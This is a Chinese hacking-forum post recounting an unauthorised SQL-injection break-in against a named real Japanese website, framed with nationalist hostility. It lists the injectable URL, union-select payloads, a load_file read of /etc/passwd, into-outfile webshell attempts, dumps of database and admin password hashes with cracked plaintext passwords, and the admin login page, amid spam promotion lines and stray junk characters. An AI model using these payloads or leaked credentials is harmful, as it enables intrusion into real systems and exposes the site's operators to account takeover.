原创 检测汉奸站全过程

xiancda

补：www.zuaa.jp测试

, y; ~( B0 h& I( ^0x01. 检测 www.zuaa.jp 收集数据
" H4 k% ]; ^8 d8 M

1 H  w3 [/ K* m1 Bwhatweb
/ q+ n" _/ _( |* F" O1 M  t
, X! |% D: k6 R8 Z
利用NMAP扫描

! L( `2 Z) v8 ^( h2 I% `$ z& M& J中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持
0x02.找注入点
0 h& s, v/ s4 k  h找注入点：http://www.zuaa.jp/php/newsdetail.php?topic_id=390
. v7 g( _1 ?+ W! F- i8 h2 T
7 y# U- r) U# s% \: W' X
0x03.order by
             http://www.zuaa.jp/php/newsdetail.php?topic_id=390 order by 1
# _( u0 Q) I# B# f
, ]. |8 p' U8 c( A$ D/ y, m& Jorder by 28报错，order by 27正常
* n4 u' O: e4 w( K
% |- T3 A2 W; P' C2 S0x04.   union手动查询
: r, k& k$ x8 V4 v; W" Lhttp://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
1 L& e" c8 w' E2 b9 `5 {添加到 27 时正常显示

中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持

" @, ]1 L9 r* n( Y' e2 F0x05. info:
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,group_concat(user(),0x3a,database(),0x3a,version(),0x3a,@@version_conpile_os),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
0 l  p7 }" y$ S3 \
' U$ |8 ?) s: g0 ~1 tuser:            root@localhost
database:    openpne
version:      4.1.22
& K4 Y2 C8 U7 g1 Q! t2 s" N- I1 wos:             portbld-freebsd5.4

0 w6 F) }. C5 P5 c" \, G  `0x06. root用户
利用 load_file(0x...), 读文件 (/etc/passwd), 也可以这样 hex(load_file(0x.....)), 然后把得到的 hex ,再转换成字符的（这种方法， 可以过大多数站）
+ g/ ], Z& f* ~" |$ Y: Y9 fhttp://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,hex(load_file(0x2f6574632f706173737764)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
9 h- h7 ]$ ]$ w  M, ~! H
通过工具转换

) U- A( v" G4 }0 Z. H中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持

0x07. 利用 into outfile
/ B- U; |( Q& f/ L3 s全部都失败
6 z. H: o# R* Rhttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/zuaa_tech/WEBSITE/htdocs/php/help.php
8 Q& y* e3 n+ U$ F- [, T
4 {: `& ?4 S" a! V" D. J0 j) lhttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/qian/OpenPNE/lib/help.php
/ h7 Z' H, y; Y+ ]) j
1 `6 J3 ^, ]9 D; L! L$ G页面显示“MDB2 Error:syntax error”

0x08. 利用 mysql 4.1
猜常规表名，字段未果 工具 sqlmap
  c+ |. Z2 ~$ h. K/ F9 {" l( f' E2 Q中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持
3 T3 r8 }, d+ H
: g; f% ]7 _+ ]5 r0 B

  S1 m; @4 o+ X/ T8 c: O0x09. 查找后台
! x1 G; z: b! z利用 现有的各种 后台工具尝试都不行
1 Q' i8 E) Q% q9 ^: v, n3 @$ `
5 ~' g* Q- G" [. A3 D0x10.  MySL外联方法
从前面 nmap 收集的信息当中，可以看到开了 mysql 3306 端口 ,尝试得 mysql 用户各密码，然后再通过 mysql 工具外连 www.zuaa.jp 不行
可以利用 mysql ( 4.x 5.) 自带的定义表 mysql.user
% r7 Z: n. a, m& e9 {0 ?8 khttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(user,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+mysql.user

这个可以在 www.cmd5.com 解密
root:*3711D518F2924AEFA6F4C6B4B7425CAE8BEB88AB zuaa2009
0 ?. F/ D, U! X" `  i* K( qchen:*2A09A939E6B654877DD70B00EA631D1007E58CC9 silkroad97
openpne:*5D80C62EC4D258534F 07D08CCE9CE27DFF26A366 ???
0 y5 {9 G  Q& P1 W2 `! x( ozuaa:*5D80C62EC4D258534F07D08CCE9CE27DFF26A366 ???
工具外连失败，据说防火墙策略只允许特定IP外连，具体不得知
0 ?" B3 }6 Y0 F: O# W

0x11. 网站突破
发现网站的源程序 openpne, google 下载 openpne 源码

/ B1 a$ v' ?6 k: V) i" T* y. a4 D
8 M, l3 ?7 s* M" ]' K( b; x0x12. 默认信息利用
http://sns.zuaa.jp/?m=admin&a=page_login

表名 (c_admin_user) ，字段名（username,password）
" ?* N: u' [: J4 L1 d+ `0 {' W: {1 ghttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+c_admin_user

解密
zuaa_tech:dd041e2 b1b8ecee164a6cb196a496eda,               zuaa2009
; G0 n0 B- t0 ]4 Hzuaajp:c0923ec5857796a393da99905008c176,          zju1897

中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持
1 H( ~: p/ r1 z0 F
0x13. 登录后台
" y9 L+ p# w6 x( Q2 U4 K9 d3 ^" L# a

" r0 o% w- l4 i1 a1 C: E# ?
0x14. 小结
( ]7 x. k  \5 o4 {$ {1 L利用网站相关信息，进行突破 利用网站相关信息，进行突破 利用网站相关信息，进行突破 利用网站相关信息，进行突破 。
感谢群 ---- 渗透 -酷帅王子 提供注入点 提供注入点
7 |" V! M( {. w/ S" n------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- -------------------------------------------------------By DarkRain
中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持
9 D& A% X' W! K& P* g7 P; ^
9 B+ Z- s7 K1 f+ z最后声明：本人只负责了整理上传到论坛，让大家学习，不是原作者，原作者辛苦了！
$ Q- a+ @' T5 A! l

荒村狂客

哪个牛人 费的这劲 入侵的